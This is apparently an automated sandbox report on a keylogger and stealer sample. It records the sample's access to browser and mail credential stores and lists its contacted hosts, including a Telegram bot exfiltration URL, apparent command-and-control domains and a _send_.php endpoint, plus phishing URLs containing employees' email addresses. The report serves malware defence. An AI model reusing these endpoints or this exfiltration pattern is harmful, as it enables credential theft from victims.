                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.52d0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1254420339.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.52d0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1254420339.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading                    		11
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		1
                    Query Registry                    		Remote Services1
                    Email Collection                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		LSASS Memory1
                    Security Software Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                    Virtualization/Sandbox Evasion                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin Shares1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection                    		NTDS31
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing                    		DCSync13
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    kP8EgMorTr.exe36%VirustotalBrowse
                    kP8EgMorTr.exe39%ReversingLabsWin32.Dropper.Generic
                    kP8EgMorTr.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		188.114.97.3
                    		truefalse
                      		high
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        checkip.dyndns.com
                        		132.226.8.169
                        		truefalse
                          		high
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              		high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2006/01/2025%20/%2020:38:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high
                                http://checkip.dyndns.org/false
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000034B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabkP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.orgkP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icokP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/botkP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.office.com/lBkP8EgMorTr.exe, 00000003.00000002.3699670660.00000000034B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://checkip.dyndns.orgkP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://chrome.google.com/webstore?hl=enkP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://varders.kozow.com:8081kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://aborters.duckdns.org:8081kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ac.ecosia.org/autocomplete?q=kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.omdbapi.com/?t=)&y=&plot=long&r=jsonkP8EgMorTr.exefalse
                                                                    		high
                                                                    http://anotherarmy.dns.army:8081kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchkP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://checkip.dyndns.org/qkP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://chrome.google.com/webstore?hl=enlBkP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003482000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$kP8EgMorTr.exe, 00000003.00000002.3699670660.000000000336C000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://reallyfreegeoip.orgkP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003342000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20akP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedkP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://reallyfreegeoip.org/xml/kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003342000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          132.226.8.169
                                                                                          		checkip.dyndns.comUnited States
                                                                                          		16989UTMEMUSfalse
                                                                                          149.154.167.220
                                                                                          		api.telegram.orgUnited Kingdom
                                                                                          		62041TELEGRAMRUfalse
                                                                                          188.114.97.3
                                                                                          		reallyfreegeoip.orgEuropean Union
                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1584668
                                                                                          Start date and time:2025-01-06 07:40:08 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 50s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:15
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:kP8EgMorTr.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:6889d04a51c7a76b2ab1b4161b2b5e5d17dc2780e29dcc78b41460f982986786.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 98
                                                                                          • Number of non-executed functions: 26
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 20.12.23.50
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          01:41:04API Interceptor10690623x Sleep call for process: kP8EgMorTr.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          132.226.8.169PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • checkip.dyndns.org/

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          reallyfreegeoip.orgPO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                          • 188.114.96.3
                                                                                          W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                          • 104.21.67.152
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 188.114.96.3
                                                                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          api.telegram.orghttps://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
